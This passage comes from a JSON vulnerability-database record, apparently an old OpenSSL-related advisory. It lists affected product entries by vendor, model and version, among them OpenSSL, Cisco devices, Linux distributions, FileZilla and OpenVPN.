            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.2"
          },
          {
            "_id": null,
            "model": "linux enterprise server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "9"
          },
          {
            "_id": null,
            "model": "stonebeat securitycluster",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "hp-ux b.11.11",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.8"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.4"
          },
          {
            "_id": null,
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "2.5.4"
          },
          {
            "_id": null,
            "model": "servercluster",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.5.2"
          },
          {
            "_id": null,
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "5.04"
          },
          {
            "_id": null,
            "model": "call manager es40",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "server",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.19"
          },
          {
            "_id": null,
            "model": "call manager es50",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "novell linux desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "project openssl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.3"
          },
          {
            "_id": null,
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "8.1.7"
          },
          {
            "_id": null,
            "model": "groupware server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "kolab",
            "version": "2.0.2"
          },
          {
            "_id": null,
            "model": "project openssl c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.1"
          },
          {
            "_id": null,
            "model": "mds",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "90001.3(3.33)"
          },
          {
            "_id": null,
            "model": "linux i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "5.04"
          },
          {
            "_id": null,
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.6"
          },
          {
            "_id": null,
            "model": "secure acs for windows server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.2"
          },
          {
            "_id": null,
            "model": "linux mips",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "ids",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "2700"
          },
          {
            "_id": null,
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1740"
          },
          {
            "_id": null,
            "model": "corporate server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1010"
          },
          {
            "_id": null,
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.3(5)"
          },
          {
            "_id": null,
            "model": "security agent",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.5.1.659"
          },
          {
            "_id": null,
            "model": "stonegate ips sensor and analyzer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0.1"
          },
          {
            "_id": null,
            "model": "networks communications server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1000"
          },
          {
            "_id": null,
            "model": "openpkg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openpkg",
            "version": "2.4"
          },
          {
            "_id": null,
            "model": "converged communications server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "10.0.0x64"
          },
          {
            "_id": null,
            "model": "filezilla",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "2.2.22"
          },
          {
            "_id": null,
            "model": "linux arm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.6.2"
          },
          {
            "_id": null,
            "model": "hardware management console for iseries r3.3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "grid engine update1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.5"
          },
          {
            "_id": null,
            "model": "css11500 content services switch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.5"
          },
          {
            "_id": null,
            "model": "s8500 r2.0.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "project openssl d",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "_id": null,
            "model": "css11500 content services switch",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.50.3.45"
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.4"
          },
          {
            "_id": null,
            "model": "networks vpn router contivity",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "-45000"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.2.2"
          },
          {
            "_id": null,
            "model": "gss global site selector",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "44900"
          },
          {
            "_id": null,
            "model": "s8700 r2.0.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.2"
          },
          {
            "_id": null,
            "model": "hp-ux b.11.23",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "project openssl beta2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "_id": null,
            "model": "-stable",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "workcentre pro",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "255"
          },
          {
            "_id": null,
            "model": "call manager es56",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.0"
          },
          {
            "_id": null,
            "model": "groupware server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "kolab",
            "version": "2.0.3"
          },
          {
            "_id": null,
            "model": "linux sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "5.10"
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "10.0x86"
          },
          {
            "_id": null,
            "model": "predictive dialing system",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "11.11"
          },
          {
            "_id": null,
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.3.9"
          },
          {
            "_id": null,
            "model": "networks vpn router contivity",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "-46000"
          },
          {
            "_id": null,
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.2"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "series airespace wireless lan controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "40003.1.59.24"
          },
          {
            "_id": null,
            "model": "ipcop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ipcop",
            "version": "1.4.12"
          },
          {
            "_id": null,
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "17500"
          },
          {
            "_id": null,
            "model": "hardware management console for iseries r1.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.5"
          },
          {
            "_id": null,
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "personal",
            "scope": null,
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": null
          },
          {
            "_id": null,
            "model": "unitedlinux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "1.0"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.3"
          },
          {
            "_id": null,
            "model": "project openssl a",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "_id": null,
            "model": "project openssl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "_id": null,
            "model": "hat network satellite (for rhel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "red",
            "version": "3)4.2"
          },
          {
            "_id": null,
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "1.4.1"
          },
          {
            "_id": null,
            "model": "predictive dialer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "0"
          },
          {
            "_id": null,
            "model": "project openssl e",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "_id": null,
            "model": "project openssl c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "_id": null,
            "model": "ftp server",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.3.3.1"
          },
          {
            "_id": null,
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.1(2)"
          },
          {
            "_id": null,
            "model": "project openssl f",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "_id": null,
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "project openssl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "_id": null,
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "1.7"
          },
          {
            "_id": null,
            "model": "openpkg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openpkg",
            "version": "2.2"
          },
          {
            "_id": null,
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.1.0.0"
          },
          {
            "_id": null,
            "model": "project openssl c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "_id": null,
            "model": "works common services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.2"
          },
          {
            "_id": null,
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.2"
          },
          {
            "_id": null,
            "model": "series airespace wireless lan controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "20003.1.59.24"
          },
          {
            "_id": null,
            "model": "-release-p20",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "4.11"
          },
          {
            "_id": null,
            "model": "linux personal x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.3"
          },
          {
            "_id": null,
            "model": "grid engine update2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "5000"
          },
          {
            "_id": null,
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0.3"
          },
          {
            "_id": null,
            "model": "linux personal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "10.1"
          },
          {
            "_id": null,
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.2.8"
          },
          {
            "_id": null,
            "model": "appliance server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "ciscosecure acs appliance",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1111"
          },
          {
            "_id": null,
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "2.5.3"
          },
          {
            "_id": null,
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.0.193"
          },
          {
            "_id": null,
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.6(1)"
          },
          {
            "_id": null,
            "model": "filezilla",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "2.2.15"
          },
          {
            "_id": null,
            "model": "hardware management console for iseries",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "secure linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "trustix",
            "version": "2.2"
          },
          {
            "_id": null,
            "model": "security mars",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.2.2"
          },
          {
            "_id": null,
            "model": "gss global site selector",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4480"
          },
          {
            "_id": null,
            "model": "call manager sr1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "linux professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "unified presence server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1.0"
          },
          {
            "_id": null,
            "model": "predictive dialing system",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "11.0"
          },
          {
            "_id": null,
            "model": "project openssl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.4"
          },
          {
            "_id": null,
            "model": "project openssl l",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "_id": null,
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.1"
          },
          {
            "_id": null,
            "model": "hardware management console for pseries r4.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.6.4"
          },
          {
            "_id": null,
            "model": "enterprise linux as",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "_id": null,
            "model": "stonegate high availability firewall and vpn",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.6.6"
          },
          {
            "_id": null,
            "model": "linux lts sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "_id": null,
            "model": "ipcop",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ipcop",
            "version": "1.4.13"
          },
          {
            "_id": null,
            "model": "insight management agents for tru64 unix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "3.5.2"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "10.1"
          },
          {
            "_id": null,
            "model": "call manager es33",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.1"
          },
          {
            "_id": null,
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "10.2"
          },
          {
            "_id": null,
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0.1"
          },
          {
            "_id": null,
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.2.3"
          },
          {
            "_id": null,
            "model": "s8300 r2.0.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "openpkg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openpkg",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "call manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.3.1"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.4.1"
          },
          {
            "_id": null,
            "model": "networks ip address domain manager",
            "scope": null,
            "trust": 0.3,
            "vendor": "nortel",
            "version": null
          },
          {
            "_id": null,
            "model": "project openssl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.5"
          },
          {
            "_id": null,
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.8"
          },
          {
            "_id": null,
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "f...",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "10"
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.3"
          },
          {
            "_id": null,
            "model": "-prerelease",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.4"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.3"
          },
          {
            "_id": null,
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154543.0"
          },
          {
            "_id": null,
            "model": "beta11",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "grid engine 32-bit sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "5.3"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.3.1"
          },
          {
            "_id": null,
            "model": "mds 9216i",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "enterprise linux ws ia64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "enterprise linux as",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.6.3"
          },
          {
            "_id": null,
            "model": "hardware management console for pseries r3.6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "s8710 r2.0.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.2"
          },
          {
            "_id": null,
            "model": "openpkg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openpkg",
            "version": "2.3"
          },
          {
            "_id": null,
            "model": "stonebeat fullcluster for raptor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.5"
          },
          {
            "_id": null,
            "model": "hp-ux b.11.00",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "filezilla",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "2.2.28"
          },
          {
            "_id": null,
            "model": "hp-ux b.11.31",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "novell linux desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "1.0"
          },
          {
            "_id": null,
            "model": "linux personal x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.2"
          },
          {
            "_id": null,
            "model": "project openssl e",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "_id": null,
            "model": "ciscoworks common management foundation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.9"
          },
          {
            "_id": null,
            "model": "hardware management console for pseries r3.1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0.8"
          },
          {
            "_id": null,
            "model": "computing snapgear sg710",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "0"
          },
          {
            "_id": null,
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.3"
          },
          {
            "_id": null,
            "model": "call manager es62",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "project openssl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "_id": null,
            "model": "solaris 9 sparc",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.1"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.3.132"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.2.2"
          },
          {
            "_id": null,
            "model": "css11500 content services switch s",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.10"
          },
          {
            "_id": null,
            "model": "download accelarator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "prozilla",
            "version": "1.2.1"
          },
          {
            "_id": null,
            "model": "groupware server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "kolab",
            "version": "2.0.1"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.1"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.2"
          },
          {
            "_id": null,
            "model": "mds",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "90002.0(0.86)"
          },
          {
            "_id": null,
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "255"
          },
          {
            "_id": null,
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.3"
          },
          {
            "_id": null,
            "model": "css11500 content services switch",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "8.10.2.65"
          },
          {
            "_id": null,
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.4"
          },
          {
            "_id": null,
            "model": "linux s/390",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "sip proxy server",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "workcentre pro",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "238"
          },
          {
            "_id": null,
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.5"
          },
          {
            "_id": null,
            "model": "openvms secure web server",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.2"
          },
          {
            "_id": null,
            "model": "project openssl k",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "_id": null,
            "model": "enterprise linux as ia64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "server b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.8"
          },
          {
            "_id": null,
            "model": "secure acs for unix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.3.5.1"
          },
          {
            "_id": null,
            "model": "linux enterprise server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "_id": null,
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "2.1.3"
          },
          {
            "_id": null,
            "model": "secure acs for unix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.3.6.1"
          },
          {
            "_id": null,
            "model": "workcentre pro",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "275"
          },
          {
            "_id": null,
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "5.10"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "-release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "stonebeat webcluster",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "linux lts powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "_id": null,
            "model": "grid engine update3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "s8500",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "0"
          },
          {
            "_id": null,
            "model": "secure acs solution engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.3.2"
          },
          {
            "_id": null,
            "model": "project openssl beta3",
            "scope": "eq",
            "trust": 0.3,
